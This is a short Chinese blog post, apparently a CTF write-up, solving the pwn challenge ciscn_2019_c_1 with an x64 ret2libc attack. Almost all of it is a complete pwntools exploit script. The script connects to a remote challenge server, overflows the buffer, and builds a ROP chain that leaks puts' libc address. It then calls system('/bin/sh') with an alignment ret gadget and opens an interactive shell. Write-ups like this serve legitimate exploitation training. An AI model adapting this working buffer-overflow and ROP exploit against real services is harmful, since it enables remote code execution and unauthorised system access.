pwn | ciscn_2019_c_1
ciscn_2019_c_1
x64下的 ret2libc + 构造rop
同样还是要注意 libc 版本 >2.27 的时候，call system 前栈指针要 16 字节对齐，所以这里多了一个 ret
exp:
from pwn import *
from LibcSearcher.LibcSearcher import *
import time

context.log_level = 'debug'

# Target connection. The two commented lines below are the local / gdb variants
# (the gdb one still names a different challenge binary and looks like a leftover).
sh = remote('node4.buuoj.cn', 25865)
# sh = process('./ciscn_2019_c_1')
# sh = gdb.debug('./warmup_csaw_2016', '0x00000000004006A3')
elf = ELF('./ciscn_2019_c_1')  # challenge binary, used only for plt/got lookups

# Fixed addresses inside the binary.
GADGET_POP_RDI_RET = 0x0000000000400c83  # pop rdi ; ret
ADDR_MAIN = 0x400b28                      # re-enter main for a second overflow
GADGET_RET = 0x4006b9                     # lone ret: realigns the stack before system

# Filler length between the buffer start (after the leading NUL) and the saved
# return address. NOTE(review): the NUL prefix and the 0x50-1+8 length are taken
# as-is from the original exploit; the stack layout is not re-derived here.
FILLER_LEN = 0x50 - 1 + 8

# Symbols needed for the leak.
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
print(f'puts_plt:{puts_plt}')
print(f'puts_got:{puts_got}')

# Short pause before consuming the banner.
time.sleep(1)
sh.recv()
sh.send('1\n')  # menu choice
sh.recvuntil('encrypted\n')

# Stage 1: puts(puts_got) leaks puts' libc address, then return to main.
leak_chain = b''.join([
    b'\x00' + b'a' * FILLER_LEN,
    p64(GADGET_POP_RDI_RET),
    p64(puts_got),   # rdi = puts@got
    p64(puts_plt),   # puts(rdi) prints the libc address of puts
    p64(ADDR_MAIN),  # back to main
])
sh.sendline(leak_chain)
sh.recvline()
sh.recvline()
leaked = sh.recvuntil('\n', drop=True)
puts_libcaddr = u64(leaked.ljust(8, b'\x00'))
print(f'puts:{puts_libcaddr:#x}')

# Identify libc from the leaked symbol and rebase the symbols we need.
libc = LibcSearcher('puts', puts_libcaddr)
libc_base = puts_libcaddr - libc.dump('puts')
binsh_addr = libc_base + libc.dump('str_bin_sh')
system_addr = libc_base + libc.dump('system')

sh.recv()
sh.send('1\n')  # same menu choice for the second overflow

# Stage 2: ret (alignment) ; pop rdi ; "/bin/sh" ; system
shell_chain = b''.join([
    b'\x00' + b'M' * FILLER_LEN,
    p64(GADGET_RET),
    p64(GADGET_POP_RDI_RET),
    p64(binsh_addr),
    p64(system_addr),
])
sh.recv()
sh.sendline(shell_chain)
sh.interactive()
sh.close()
基本就是这样
over.
本文来自博客园,作者:Mz1,转载请注明原文链接:https://www.cnblogs.com/Mz1-rc/p/15553823.html
如果有问题可以在下方评论或者email:mzi_mzi@163.com